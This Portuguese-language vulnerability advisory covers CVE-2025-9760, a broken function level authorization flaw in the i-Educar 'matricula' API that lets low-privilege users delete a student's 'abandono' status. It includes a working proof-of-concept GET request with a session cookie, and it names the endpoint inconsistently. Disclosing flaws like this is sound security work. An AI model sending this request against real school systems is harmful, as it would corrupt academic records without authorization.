Featured image of post CVE-2025-9760
Controle De Acesso Quebrado Moderado I-Educar Securança WebApp BFLA

CVE-2025-9760

Controle de Acesso Quebrado

CVE-2025-9760: Broken Function Level Authorization (BFLA) na API matricula permite a exclusão do status “abandono”

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-9760

Resumo

Uma vulnerabilidade Broken Function Level Authorization (BFLA) foi identificada na API matricula do aplicativo i-Educar. Esse problema permite que usuários com poucos privilégios excluam o status "abandono" (abandono) de matrículas arbitrárias de alunos manipulando parâmetros de solicitação.

Detalhes

Endpoint Vulnerável:
GET /module/Api/aluno

O aplicativo não aplica verificações de autorização para garantir que apenas usuários com privilégios (por exemplo, administradores) possam realizar operações confidenciais, como excluir um status de abandono. Ao alterar o parâmetro id, um invasor pode afetar registros que não lhe pertencem.

PoC

  • Autenticar como um usuário sem privilégios.

  • Enviar a seguinte requisição:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /module/Api/matricula?&oper=delete&resource=abandono&id=206 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206
Cookie: i_educar_session=Mz9IKWGOP641g4BLkSGRnxs69wk4ChmUUxUerX19
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

  • Observamos que a exclusão foi bem-sucedida.

Impacto

Esta é uma vulnerabilidade Broken Function Level Authorization (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem:

  • Adulteração de dados acadêmicos sem autorização.
  • Perda da integridade de dados em registros escolares.
  • Potenciais danos legais e à reputação de instituições de ensino.

Referência

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9760.md

Finder

Marcelo Queiroz

Por: CVE-Hunters

© 2020 - 2025 CVE-Hunters
Built with Hugo
Theme Stack designed by Jimmy